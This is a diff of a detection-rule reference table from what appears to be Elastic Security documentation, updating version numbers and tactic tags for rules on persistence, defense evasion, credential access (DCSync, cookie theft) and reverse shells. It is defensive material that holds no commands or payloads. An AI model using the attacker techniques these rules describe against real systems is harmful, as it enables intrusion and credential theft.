[Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 -|<<network-connection-via-recently-compiled-executable, Network Connection via Recently Compiled Executable>> |This rule monitors a sequence involving a program compilation event followed by its execution and a subsequent network connection event. This behavior can indicate the set up of a reverse tcp connection to a command-and-control server. Attackers may spawn reverse shells to establish persistence onto a target system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |1 +|<<network-connection-via-recently-compiled-executable, Network Connection via Recently Compiled Executable>> |This rule monitors a sequence involving a program compilation event followed by its execution and a subsequent network connection event. This behavior can indicate the set up of a reverse tcp connection to a command-and-control server. Attackers may spawn reverse shells to establish persistence onto a target system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |2 -|<<network-connection-via-registration-utility, Network Connection via Registration Utility>> |Identifies the native Windows tools regsvr32.exe, regsvr64.exe, RegSvcs.exe, or RegAsm.exe making a network connection. This may be indicative of an attacker bypassing allowlists or running arbitrary scripts via a signed Microsoft binary. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |105 +|<<network-connection-via-registration-utility, Network Connection via Registration Utility>> |Identifies the native Windows tools regsvr32.exe, regsvr64.exe, RegSvcs.exe, or RegAsm.exe making a network connection. This may be indicative of an attacker bypassing allowlists or running arbitrary scripts via a signed Microsoft binary. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 -|<<network-connection-via-signed-binary, Network Connection via Signed Binary>> |Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Adversaries may use these binaries to 'live off the land' and execute malicious files that could bypass application allowlists and signature validation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |105 +|<<network-connection-via-signed-binary, Network Connection via Signed Binary>> |Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Adversaries may use these binaries to 'live off the land' and execute malicious files that could bypass application allowlists and signature validation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 |<<network-logon-provider-registry-modification, Network Logon Provider Registry Modification>> |Identifies the modification of the network logon provider registry. Adversaries may register a rogue network logon provider module for persistence and/or credential access via intercepting the authentication credentials in clear text during user logon. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 |<<network-traffic-to-rare-destination-country, Network Traffic to Rare Destination Country>> |A machine learning job detected a rare destination country name in the network logs. This can be due to initial access, persistence, command-and-control, or exfiltration activity. For example, when a user clicks on a link in a phishing email or opens a malicious document, a request may be sent to download and run a payload from a server in a country which does not normally appear in network traffic or business work-flows. Malware instances and persistence mechanisms may communicate with command-and-control (C2) infrastructure in their country of origin, which may be an unusual destination country for the source network. |[Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning] |8.3.0 |103 -|<<network-level-authentication-nla-disabled, Network-Level Authentication (NLA) Disabled>> |Identifies the attempt to disable Network-Level Authentication (NLA) via registry modification. Network Level Authentication (NLA) is a feature on Windows that provides an extra layer of security for Remote Desktop (RDP) connections, as it requires users to authenticate before allowing a full RDP session. Attackers can disable NLA to enable persistence methods that require access to the Windows sign-in screen without authenticating, such as Accessibility Features persistence methods, like Sticky Keys. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Rule Type: BBR] |8.3.0 |1 +|<<network-level-authentication-nla-disabled, Network-Level Authentication (NLA) Disabled>> |Identifies the attempt to disable Network-Level Authentication (NLA) via registry modification. Network Level Authentication (NLA) is a feature on Windows that provides an extra layer of security for Remote Desktop (RDP) connections, as it requires users to authenticate before allowing a full RDP session. Attackers can disable NLA to enable persistence methods that require access to the Windows sign-in screen without authenticating, such as Accessibility Features persistence methods, like Sticky Keys. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Rule Type: BBR] |8.3.0 |2 -|<<new-activesyncalloweddeviceid-added-via-powershell, New ActiveSyncAllowedDeviceID Added via PowerShell>> |Identifies the use of the Exchange PowerShell cmdlet, Set-CASMailbox, to add a new ActiveSync allowed device. Adversaries may target user email to collect sensitive information. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<new-activesyncalloweddeviceid-added-via-powershell, New ActiveSyncAllowedDeviceID Added via PowerShell>> |Identifies the use of the Exchange PowerShell cmdlet, Set-CASMailbox, to add a new ActiveSync allowed device. Adversaries may target user email to collect sensitive information. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<new-github-app-installed, New GitHub App Installed>> |This rule detects when a new GitHub App has been installed in your organization account. GitHub Apps extend GitHub's functionality both within and outside of GitHub. When an app is installed it is granted permissions to read or modify your repository and organization data. Only trusted apps should be installed and any newly installed apps should be investigated to verify their legitimacy. Unauthorized app installation could lower your organization's security posture and leave you exposed for future attacks. |[Domain: Cloud], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Github] |8.3.0 |1 |<<new-github-owner-added, New GitHub Owner Added>> |Detects when a new member is added to a GitHub organization as an owner. This role provides admin level privileges. Any new owner roles should be investigated to determine it's validity. Unauthorized owner roles could indicate compromise within your organization and provide unlimited access to data and settings. |[Domain: Cloud], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Github] |8.3.0 |1 -|<<new-systemd-service-created-by-previously-unknown-process, New Systemd Service Created by Previously Unknown Process>> |Systemd service files are configuration files in Linux systems used to define and manage system services. Malicious actors can leverage systemd service files to achieve persistence by creating or modifying service files to execute malicious commands or payloads during system startup. This allows them to maintain unauthorized access, execute additional malicious activities, or evade detection. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.6.0 |4 +|<<new-systemd-service-created-by-previously-unknown-process, New Systemd Service Created by Previously Unknown Process>> |Systemd service files are configuration files in Linux systems used to define and manage system services. Malicious actors can leverage systemd service files to achieve persistence by creating or modifying service files to execute malicious commands or payloads during system startup. This allows them to maintain unauthorized access, execute additional malicious activities, or evade detection. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.6.0 |5 -|<<new-systemd-timer-created, New Systemd Timer Created>> |Detects the creation of a systemd timer within any of the default systemd timer directories. Systemd timers can be used by an attacker to gain persistence, by scheduling the execution of a command or script. Similarly to cron/at, systemd timers can be set up to execute on boot time, or on a specific point in time, which allows attackers to regain access in case the connection to the infected asset was lost. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |5 +|<<new-systemd-timer-created, New Systemd Timer Created>> |Detects the creation of a systemd timer within any of the default systemd timer directories. Systemd timers can be used by an attacker to gain persistence, by scheduling the execution of a command or script. Similarly to cron/at, systemd timers can be set up to execute on boot time, or on a specific point in time, which allows attackers to regain access in case the connection to the infected asset was lost. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |6 |<<new-or-modified-federation-domain, New or Modified Federation Domain>> |Identifies a new or modified federation domain, which can be used to create a trust between O365 and an external identity provider. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation] |8.3.0 |102 -|<<nping-process-activity, Nping Process Activity>> |Nping ran on a Linux host. Nping is part of the Nmap tool suite and has the ability to construct raw packets for a wide variety of security testing applications, including denial of service testing. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<nping-process-activity, Nping Process Activity>> |Nping ran on a Linux host. Nping is part of the Nmap tool suite and has the ability to construct raw packets for a wide variety of security testing applications, including denial of service testing. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<nullsessionpipe-registry-modification, NullSessionPipe Registry Modification>> |Identifies NullSessionPipe registry modifications that specify which pipes can be accessed anonymously. This could be indicative of adversary lateral movement preparation by making the added pipe available to everyone. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<nullsessionpipe-registry-modification, NullSessionPipe Registry Modification>> |Identifies NullSessionPipe registry modifications that specify which pipes can be accessed anonymously. This could be indicative of adversary lateral movement preparation by making the added pipe available to everyone. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<o365-email-reported-by-user-as-malware-or-phish, O365 Email Reported by User as Malware or Phish>> |Detects the occurrence of emails reported as Phishing or Malware by Users. Security Awareness training is essential to stay ahead of scammers and threat actors, as security products can be bypassed, and the user can still receive a malicious message. Educating users to report suspicious messages can help identify gaps in security controls and prevent malware infections and Business Email Compromise attacks. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Initial Access] |8.3.0 |102 @@ -968,19 +994,19 @@ and their rule type is `machine_learning`. |<<o365-mailbox-audit-logging-bypass, O365 Mailbox Audit Logging Bypass>> |Detects the occurrence of mailbox audit bypass associations. The mailbox audit is responsible for logging specified mailbox events (like accessing a folder or a message or permanently deleting a message). However, actions taken by some authorized accounts, such as accounts used by third-party tools or accounts used for lawful monitoring, can create a large number of mailbox audit log entries and may not be of interest to your organization. Because of this, administrators can create bypass associations, allowing certain accounts to perform their tasks without being logged. Attackers can abuse this allowlist mechanism to conceal actions taken, as the mailbox audit will log no activity done by the account. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Initial Access], [Tactic: Defense Evasion] |8.3.0 |102 -|<<office-test-registry-persistence, Office Test Registry Persistence>> |Identifies the modification of the Microsoft Office "Office Test" Registry key, a registry location that can be used to specify a DLL which will be executed every time an MS Office application is started. Attackers can abuse this to gain persistence on a compromised host. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 +|<<office-test-registry-persistence, Office Test Registry Persistence>> |Identifies the modification of the Microsoft Office "Office Test" Registry key, a registry location that can be used to specify a DLL which will be executed every time an MS Office application is started. Attackers can abuse this to gain persistence on a compromised host. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |2 -|<<okta-brute-force-or-password-spraying-attack, Okta Brute Force or Password Spraying Attack>> |Identifies a high number of failed Okta user authentication attempts from a single IP address, which could be indicative of a brute force or password spraying attack. An adversary may attempt a brute force or password spraying attack to obtain unauthorized access to user accounts. |[Use Case: Identity and Access Audit], [Tactic: Credential Access], [Data Source: Okta] |8.3.0 |106 +|<<okta-brute-force-or-password-spraying-attack, Okta Brute Force or Password Spraying Attack>> |Identifies a high number of failed Okta user authentication attempts from a single IP address, which could be indicative of a brute force or password spraying attack. An adversary may attempt a brute force or password spraying attack to obtain unauthorized access to user accounts. |[Use Case: Identity and Access Audit], [Tactic: Credential Access], [Data Source: Okta] |8.10.0 |207 -|<<okta-threatinsight-threat-suspected-promotion, Okta ThreatInsight Threat Suspected Promotion>> |Okta ThreatInsight is a feature that provides valuable debug data regarding authentication and authorization processes, which is logged in the system. Within this data, there is a specific field called threat_suspected, which represents Okta's internal evaluation of the authentication or authorization workflow. When this field is set to True, it suggests the presence of potential credential access techniques, such as password-spraying, brute-forcing, replay attacks, and other similar threats. |[Use Case: Identity and Access Audit], [Data Source: Okta] |8.3.0 |104 +|<<okta-threatinsight-threat-suspected-promotion, Okta ThreatInsight Threat Suspected Promotion>> |Okta ThreatInsight is a feature that provides valuable debug data regarding authentication and authorization processes, which is logged in the system. Within this data, there is a specific field called threat_suspected, which represents Okta's internal evaluation of the authentication or authorization workflow. When this field is set to True, it suggests the presence of potential credential access techniques, such as password-spraying, brute-forcing, replay attacks, and other similar threats. |[Use Case: Identity and Access Audit], [Data Source: Okta] |8.10.0 |205 -|<<okta-user-session-impersonation, Okta User Session Impersonation>> |A user has initiated a session impersonation granting them access to the environment with the permissions of the user they are impersonating. This would likely indicate Okta administrative access and should only ever occur if requested and expected. |[Use Case: Identity and Access Audit], [Tactic: Credential Access], [Data Source: Okta] |8.3.0 |106 +|<<okta-user-session-impersonation, Okta User Session Impersonation>> |A user has initiated a session impersonation granting them access to the environment with the permissions of the user they are impersonating. This would likely indicate Okta administrative access and should only ever occur if requested and expected. |[Use Case: Identity and Access Audit], [Tactic: Credential Access], [Data Source: Okta] |8.10.0 |207 |<<onedrive-malware-file-upload, OneDrive Malware File Upload>> |Identifies the occurence of files uploaded to OneDrive being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunity to gain initial access to other endpoints in the environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Lateral Movement] |8.3.0 |102 -|<<outbound-scheduled-task-activity-via-powershell, Outbound Scheduled Task Activity via PowerShell>> |Identifies the PowerShell process loading the Task Scheduler COM DLL followed by an outbound RPC network connection within a short time period. This may indicate lateral movement or remote discovery via scheduled tasks. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |104 +|<<outbound-scheduled-task-activity-via-powershell, Outbound Scheduled Task Activity via PowerShell>> |Identifies the PowerShell process loading the Task Scheduler COM DLL followed by an outbound RPC network connection within a short time period. This may indicate lateral movement or remote discovery via scheduled tasks. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |105 -|<<parent-process-pid-spoofing, Parent Process PID Spoofing>> |Identifies parent process spoofing used to thwart detection. Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 +|<<parent-process-pid-spoofing, Parent Process PID Spoofing>> |Identifies parent process spoofing used to thwart detection. Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |105 |<<peripheral-device-discovery, Peripheral Device Discovery>> |Identifies use of the Windows file system utility (fsutil.exe) to gather information about attached peripheral devices and components connected to a computer system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 @@ -996,39 +1022,39 @@ and their rule type is `machine_learning`. |<<persistence-via-folder-action-script, Persistence via Folder Action Script>> |Detects modification of a Folder Action script. A Folder Action script is executed when the folder to which it is attached has items added or removed, or when its window is opened, closed, moved, or resized. Adversaries may abuse this feature to establish persistence by utilizing a malicious script. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 -|<<persistence-via-hidden-run-key-detected, Persistence via Hidden Run Key Detected>> |Identifies a persistence mechanism that utilizes the NtSetValueKey native API to create a hidden (null terminated) registry key. An adversary may use this method to hide from system utilities such as the Registry Editor (regedit). |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<persistence-via-hidden-run-key-detected, Persistence via Hidden Run Key Detected>> |Identifies a persistence mechanism that utilizes the NtSetValueKey native API to create a hidden (null terminated) registry key. An adversary may use this method to hide from system utilities such as the Registry Editor (regedit). |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 -|<<persistence-via-kde-autostart-script-or-desktop-file-modification, Persistence via KDE AutoStart Script or Desktop File Modification>> |Identifies the creation or modification of a K Desktop Environment (KDE) AutoStart script or desktop file that will execute upon each user logon. Adversaries may abuse this method for persistence. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<persistence-via-kde-autostart-script-or-desktop-file-modification, Persistence via KDE AutoStart Script or Desktop File Modification>> |Identifies the creation or modification of a K Desktop Environment (KDE) AutoStart script or desktop file that will execute upon each user logon. Adversaries may abuse this method for persistence. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<persistence-via-login-or-logout-hook, Persistence via Login or Logout Hook>> |Identifies use of the Defaults command to install a login or logoff hook in MacOS. An adversary may abuse this capability to establish persistence in an environment by inserting code to be executed at login or logout. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 -|<<persistence-via-microsoft-office-addins, Persistence via Microsoft Office AddIns>> |Detects attempts to establish persistence on an endpoint by abusing Microsoft Office add-ins. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<persistence-via-microsoft-office-addins, Persistence via Microsoft Office AddIns>> |Detects attempts to establish persistence on an endpoint by abusing Microsoft Office add-ins. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 |<<persistence-via-microsoft-outlook-vba, Persistence via Microsoft Outlook VBA>> |Detects attempts to establish persistence on an endpoint by installing a rogue Microsoft Outlook VBA Template. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 -|<<persistence-via-powershell-profile, Persistence via PowerShell profile>> |Identifies the creation or modification of a PowerShell profile. PowerShell profile is a script that is executed when PowerShell starts to customize the user environment, which can be abused by attackers to persist in a environment where PowerShell is common. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |5 +|<<persistence-via-powershell-profile, Persistence via PowerShell profile>> |Identifies the creation or modification of a PowerShell profile. PowerShell profile is a script that is executed when PowerShell starts to customize the user environment, which can be abused by attackers to persist in a environment where PowerShell is common. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |6 |<<persistence-via-scheduled-job-creation, Persistence via Scheduled Job Creation>> |A job can be used to schedule programs or scripts to be executed at a specified date and time. Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 -|<<persistence-via-telemetrycontroller-scheduled-task-hijack, Persistence via TelemetryController Scheduled Task Hijack>> |Detects the successful hijack of Microsoft Compatibility Appraiser scheduled task to establish persistence with an integrity level of system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<persistence-via-telemetrycontroller-scheduled-task-hijack, Persistence via TelemetryController Scheduled Task Hijack>> |Detects the successful hijack of Microsoft Compatibility Appraiser scheduled task to establish persistence with an integrity level of system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<persistence-via-update-orchestrator-service-hijack, Persistence via Update Orchestrator Service Hijack>> |Identifies potential hijacking of the Microsoft Update Orchestrator Service to establish persistence with an integrity level of SYSTEM. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Use Case: Vulnerability], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<persistence-via-update-orchestrator-service-hijack, Persistence via Update Orchestrator Service Hijack>> |Identifies potential hijacking of the Microsoft Update Orchestrator Service to establish persistence with an integrity level of SYSTEM. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Use Case: Vulnerability], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 -|<<persistence-via-wmi-event-subscription, Persistence via WMI Event Subscription>> |An adversary can use Windows Management Instrumentation (WMI) to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<persistence-via-wmi-event-subscription, Persistence via WMI Event Subscription>> |An adversary can use Windows Management Instrumentation (WMI) to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<persistence-via-wmi-standard-registry-provider, Persistence via WMI Standard Registry Provider>> |Identifies use of the Windows Management Instrumentation StdRegProv (registry provider) to modify commonly abused registry locations for persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 |<<persistent-scripts-in-the-startup-directory, Persistent Scripts in the Startup Directory>> |Identifies script engines creating files in the Startup folder, or the creation of script files in the Startup folder. Adversaries may abuse this technique to maintain persistence in an environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 -|<<port-forwarding-rule-addition, Port Forwarding Rule Addition>> |Identifies the creation of a new port forwarding rule. An adversary may abuse this technique to bypass network segmentation restrictions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<port-forwarding-rule-addition, Port Forwarding Rule Addition>> |Identifies the creation of a new port forwarding rule. An adversary may abuse this technique to bypass network segmentation restrictions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<possible-consent-grant-attack-via-azure-registered-application, Possible Consent Grant Attack via Azure-Registered Application>> |Detects when a user grants permissions to an Azure-registered application or when an administrator grants tenant-wide permissions to an application. An adversary may create an Azure-registered application that requests access to data such as contact information, email, or documents. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |8.3.0 |106 -|<<possible-fin7-dga-command-and-control-behavior, Possible FIN7 DGA Command and Control Behavior>> |This rule detects a known command and control pattern in network events. The FIN7 threat group is known to use this command and control technique, while maintaining persistence in their target's network. |[Use Case: Threat Detection], [Tactic: Command and Control], [Domain: Endpoint] |8.3.0 |103 +|<<possible-fin7-dga-command-and-control-behavior, Possible FIN7 DGA Command and Control Behavior>> |This rule detects a known command and control pattern in network events. The FIN7 threat group is known to use this command and control technique, while maintaining persistence in their target's network. |[Use Case: Threat Detection], [Tactic: Command and Control], [Domain: Endpoint] |8.3.0 |104 -|<<possible-okta-dos-attack, Possible Okta DoS Attack>> |Detects possible Denial of Service (DoS) attacks against an Okta organization. An adversary may attempt to disrupt an organization's business operations by performing a DoS attack against its Okta service. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Impact] |8.3.0 |104 +|<<possible-okta-dos-attack, Possible Okta DoS Attack>> |Detects possible Denial of Service (DoS) attacks against an Okta organization. An adversary may attempt to disrupt an organization's business operations by performing a DoS attack against its Okta service. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Impact] |8.10.0 |205 -|<<potential-abuse-of-repeated-mfa-push-notifications, Potential Abuse of Repeated MFA Push Notifications>> |Detects when an attacker abuses the Multi-Factor authentication mechanism by repeatedly issuing login requests until the user eventually accepts the Okta push notification. An adversary may attempt to bypass the Okta MFA policies configured for an organization to obtain unauthorized access. |[Use Case: Identity and Access Audit], [Tactic: Credential Access], [Data Source: Okta] |8.3.0 |106 +|<<potential-abuse-of-repeated-mfa-push-notifications, Potential Abuse of Repeated MFA Push Notifications>> |Detects when an attacker abuses the Multi-Factor authentication mechanism by repeatedly issuing login requests until the user eventually accepts the Okta push notification. An adversary may attempt to bypass the Okta MFA policies configured for an organization to obtain unauthorized access. |[Use Case: Identity and Access Audit], [Tactic: Credential Access], [Data Source: Okta] |8.10.0 |207 |<<potential-admin-group-account-addition, Potential Admin Group Account Addition>> |Identifies attempts to add an account to the admin group via the command line. This could be an indication of privilege escalation activity. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |104 @@ -1036,53 +1062,65 @@ and their rule type is `machine_learning`. |<<potential-application-shimming-via-sdbinst, Potential Application Shimming via Sdbinst>> |The Application Shim was created to allow for backward compatibility of software as the operating system codebase changes over time. This Windows functionality has been abused by attackers to stealthily gain persistence and arbitrary code execution in legitimate Windows processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<potential-code-execution-via-postgresql, Potential Code Execution via Postgresql>> |This rule monitors for suspicious activities that may indicate an attacker attempting to execute arbitrary code within a PostgreSQL environment. Attackers can execute code via PostgreSQL as a result of gaining unauthorized access to a public facing PostgreSQL database or exploiting vulnerabilities, such as remote command execution and SQL injection attacks, which can result in unauthorized access and malicious actions, and facilitate post-exploitation activities for unauthorized access and malicious actions. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |3 +|<<potential-code-execution-via-postgresql, Potential Code Execution via Postgresql>> |This rule monitors for suspicious activities that may indicate an attacker attempting to execute arbitrary code within a PostgreSQL environment. Attackers can execute code via PostgreSQL as a result of gaining unauthorized access to a public facing PostgreSQL database or exploiting vulnerabilities, such as remote command execution and SQL injection attacks, which can result in unauthorized access and malicious actions, and facilitate post-exploitation activities for unauthorized access and malicious actions. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |4 |<<potential-command-and-control-via-internet-explorer, Potential Command and Control via Internet Explorer>> |Identifies instances of Internet Explorer (iexplore.exe) being started via the Component Object Model (COM) making unusual network connections. Adversaries could abuse Internet Explorer via COM to avoid suspicious processes making network connections and bypass host-based firewall restrictions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |104 |<<potential-cookies-theft-via-browser-debugging, Potential Cookies Theft via Browser Debugging>> |Identifies the execution of a Chromium based browser with the debugging process argument, which may indicate an attempt to steal authentication cookies. An adversary may steal web application or service session cookies and use them to gain access web applications or Internet services as an authenticated user without needing credentials. |[Domain: Endpoint], [OS: Linux], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |103 -|<<potential-credential-access-via-dcsync, Potential Credential Access via DCSync>> |This rule identifies when a User Account starts the Active Directory Replication Process. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Active Directory], 